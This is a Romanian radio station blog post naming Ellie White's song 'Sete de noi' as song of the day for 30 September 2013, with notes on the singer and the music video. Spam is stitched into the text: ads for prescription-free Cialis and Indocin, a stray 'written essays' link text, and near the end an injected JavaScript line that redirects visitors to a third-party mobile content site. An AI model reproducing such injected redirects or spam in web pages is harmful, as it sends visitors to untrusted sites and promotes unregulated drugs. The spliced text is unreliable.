Melodia zilei de 30 Septembrie 2013

 

Ellie White – “Sete de noi”

Ellie White, pe numele ei real Elena Baltagan, este o cantareata de muzica dance, nascuta pe 28 februarie 1984, in Buzau. No Prescription Online Cialis Soft Tabs. Men’s Health. Diners, Safe & Secure, Erectile Dysfunction, All Medications Are Certificated!

Dupa succesul melodiei ‘Power Of Love’, Ellie White va ‘ataca’ topurile nationale si internationale cu noua ei piesa, inregistrata in limba romana.

Cel mai recent single, scris in parte si de Ellie, spune o frumoasa poveste de dragoste, fiind o piesa plina de sensibilitate si romantism. Videoclipul piesei va fi colorat si vesel, din dorinta de a demonstra ca desi versurile sunt pe alocuri triste, intotdeauna trebuie sa crezi in finaluri fericite.

ellie_white_sete_de_noi_cover_2d8cdc2f2f-300x300

buy indomethacin capsules buy indocin online buy generic indocin buy Indocin no prescription indomethacin to buy >>> Click Here to Order Indocin Online <<< Ellie White ne prezinta astazi mult asteptatul videoclip la piesa ce s-a auzit in cluburi toata iarna, “Sete de noi”. Videoclipul a fost filmat in decursul a 3 zile , o parte din el fiind captat in clubul Fabrica.Ea, Madalina Anea si George Pistereanu sunt principalii protagonisti ai videoclipului.Ellie reprezinta personajul pozitiv care vrea sa il cucereasca pe George in timp ce Madalina este fata rebela care vrea sa il innebuneasca.Videoclipul a fost conceput cu ajutorul celor de la Castel Film.

Ellie-White-a-primit-un-al-2-lea-inel-de-logodna

O melodie frumoasa semnata de Ellie White – “Sete de noi”, este aleasa melodia zilei de 30 Septembrie 2013 la Radio Enigma Romania.

Ellie-White

O melodie superba pe care tu enigmatic/a… ai ales-o piesa zilei si pe care noi cei de la Radio Enigma Romania ti-o daruim cu mare drag si mereu cu acelasi mesaj: Simte, traieste si iubeste!

Haideti sa il ascultam si noi. written essays

O zi frumoasa sa ai alaturi de cei dragi tie, alaturi de
Radio Enigma Romania -Vocea gandurilor tale.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *